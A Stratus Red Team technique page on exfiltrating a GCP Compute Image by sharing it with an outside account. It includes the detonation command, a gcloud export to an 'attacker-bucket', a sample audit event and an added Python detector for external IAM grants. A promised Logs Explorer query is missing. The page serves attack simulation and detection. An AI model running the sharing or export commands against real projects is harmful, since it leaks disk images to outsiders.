
Exfiltrate Compute Image by sharing it

Properties: slow, idempotent

Platform: GCP


MITRE ATT&CK Tactics:

  • Exfiltration


Exfiltrates a Compute Image by sharing it with a fictitious attacker account. Once the image is shared, the attacker can create a copy of the image, or a disk from it, in their own GCP project.


Warm-up:

  • Create a Compute Image


Detonation:

  • Set the IAM policy of the image so that the attacker account has permissions to read the image from their own project


Since the target e-mail must exist for this attack simulation to work, Stratus Red Team grants the role to a default account. This is a real Google account, owned by the Stratus Red Team maintainers and not used for any purpose other than this attack simulation. You can override this behavior by setting the environment variable STRATUS_RED_TEAM_ATTACKER_EMAIL before detonating, for instance:

    export STRATUS_RED_TEAM_ATTACKER_EMAIL="attacker@example.com"   # placeholder: an account you control
    stratus detonate gcp.exfiltration.share-compute-image


Detonate with Stratus Red Team:

    stratus detonate gcp.exfiltration.share-compute-image


You can detect when someone changes the IAM policy of a Compute Image using the GCP Admin Activity audit log event whose methodName is v1.compute.images.setIamPolicy. Here's a sample event, shortened for clarity:

    {
      "protoPayload": {
        "@type": "...",
        "authenticationInfo": {
          "principalEmail": "user-sharing-the-image@domain.tld",
          "principalSubject": "user:user-sharing-the-image@domain.tld"
        },
        "requestMetadata": {
          "callerIp": "...",
          "callerSuppliedUserAgent": "google-cloud-sdk gcloud/..."
        },
        "serviceName": "compute.googleapis.com",
        "methodName": "v1.compute.images.setIamPolicy",
        "resourceName": "projects/victim-project/global/images/stratus-red-team-victim-image",
        "request": {
          "policy": {
            "version": "3",
            "bindings": [
              {
                "role": "roles/owner",
                "members": [
                  "user:<attacker-email>"
                ]
              }
            ]
          },
          "@type": "..."
        }
      }
    }

Note that the request carries the complete new policy, not just the binding that was added: to know which member is new, compare it with the previous policy of the image.

After the attacker has permissions on the Compute Image, they can export it to a Cloud Storage bucket in their own GCP project using:

    gcloud compute images export \
        --image stratus-red-team-victim-image \
        --image-project victim-project \
        --destination-uri gs://attacker-bucket/victim-image

The --image-project flag points at the victim project so that gcloud resolves the shared image there instead of looking for it in the attacker's own project. The export job itself runs in the attacker's project, so read access to the image is the only permission the attacker needs on the victim side.

Based on this event, detection strategies may include:

  • Alerting when the IAM policy of a Compute Image is changed, especially if such a sharing mechanism is not part of your normal operations. Sample GCP Logs Explorer query:
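Matching the methodName tells you that a policy changed, but not what changed: as noted above, the setIamPolicy event carries the whole new policy. The following Python is an added example, not Stratus Red Team or Google code. It diffs each image's policy against the last one seen for that image and reports every newly added principal that sits outside the organisation. The allowed domains, the project name and the audit events are constructed for the example.

```python
"""Flag Compute Image IAM-policy changes that grant access to outside principals.

Added example (not Stratus Red Team or Google code). Runs over constructed
Admin Activity audit log events shaped like the v1.compute.images.setIamPolicy
sample above; every value in them is made up for the example.
"""

ALLOWED_DOMAINS = {"domain.tld"}       # assumption: the victim org's identity domains
ALLOWED_PROJECTS = {"victim-project"}  # assumption: projects whose service accounts are trusted
METHOD = "v1.compute.images.setIamPolicy"

VICTIM_IMAGE = "projects/victim-project/global/images/stratus-red-team-victim-image"
OTHER_IMAGE = "projects/victim-project/global/images/golden-image"


def _setiam_event(actor, resource, bindings):
    """Build a minimal setIamPolicy audit entry (constructed test data, not a real log)."""
    return {
        "resource": {"type": "gce_image"},
        "protoPayload": {
            "methodName": METHOD,
            "authenticationInfo": {"principalEmail": actor},
            "resourceName": resource,
            "request": {"policy": {"version": "3", "bindings": bindings}},
        },
    }


SAMPLE_EVENTS = [
    # 1. Baseline: an admin grants an internal group read access. Nothing external.
    _setiam_event("admin@domain.tld", VICTIM_IMAGE, [
        {"role": "roles/compute.imageUser", "members": ["group:builders@domain.tld"]},
    ]),
    # 2. Noise: a plain read of the image, not a policy change.
    {"resource": {"type": "gce_image"},
     "protoPayload": {"methodName": "v1.compute.images.get",
                      "authenticationInfo": {"principalEmail": "admin@domain.tld"},
                      "resourceName": VICTIM_IMAGE}},
    # 3. Detonation: the image is shared with an outside account as roles/owner.
    _setiam_event("user-sharing-the-image@domain.tld", VICTIM_IMAGE, [
        {"role": "roles/compute.imageUser", "members": ["group:builders@domain.tld"]},
        {"role": "roles/owner", "members": ["user:attacker@attacker-domain.tld"]},
    ]),
    # 4. Another image, never seen before, opened to every Google account.
    _setiam_event("admin@domain.tld", OTHER_IMAGE, [
        {"role": "roles/compute.imageUser", "members": ["allAuthenticatedUsers"]},
    ]),
]


def principal_is_external(member, allowed_domains=ALLOWED_DOMAINS,
                          allowed_projects=ALLOWED_PROJECTS):
    """True if an IAM member string refers to an identity outside the organisation."""
    if member in ("allUsers", "allAuthenticatedUsers"):
        return True
    kind, _, ident = member.partition(":")
    if kind == "domain":
        return ident not in allowed_domains
    if kind in ("projectOwner", "projectEditor", "projectViewer"):
        return ident not in allowed_projects
    if kind == "serviceAccount":
        # Trusted projects' service accounts look like NAME@PROJECT.iam.gserviceaccount.com
        return not any(ident.endswith(f"@{p}.iam.gserviceaccount.com") for p in allowed_projects)
    if kind in ("user", "group") and "@" in ident:
        return ident.rsplit("@", 1)[1] not in allowed_domains
    # deleted: principals or anything unrecognised: treat as suspicious, not as allowed.
    return True


def bindings_as_set(policy):
    """Flatten a policy into {(role, member)} pairs so two versions can be diffed."""
    return {(b["role"], m) for b in policy.get("bindings", []) for m in b.get("members", [])}


def detect(events, allowed_domains=ALLOWED_DOMAINS, allowed_projects=ALLOWED_PROJECTS):
    """Return one finding per external principal that a setIamPolicy call adds.

    The event carries the whole new policy, so the detector keeps the last policy
    seen per image and diffs against it. With no baseline, every binding is new.
    """
    last_policy = {}  # resourceName -> set of (role, member)
    findings = []
    for ev in events:
        payload = ev.get("protoPayload", {})
        if ev.get("resource", {}).get("type") != "gce_image" or payload.get("methodName") != METHOD:
            continue
        resource = payload["resourceName"]
        current = bindings_as_set(payload.get("request", {}).get("policy", {}))
        previous = last_policy.get(resource)
        added = current if previous is None else current - previous
        last_policy[resource] = current
        for role, member in sorted(added):
            if principal_is_external(member, allowed_domains, allowed_projects):
                findings.append({"resource": resource,
                                 "actor": payload["authenticationInfo"]["principalEmail"],
                                 "role": role, "member": member,
                                 "has_baseline": previous is not None})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

On the constructed events this reports two findings: the roles/owner grant to the attacker account (diffed against the image's earlier policy) and the allAuthenticatedUsers grant on the second image, marked as having no baseline. In production the baseline should come from an asset inventory or the earliest retained setIamPolicy event, otherwise the first sighting of a long-shared image produces a burst of findings.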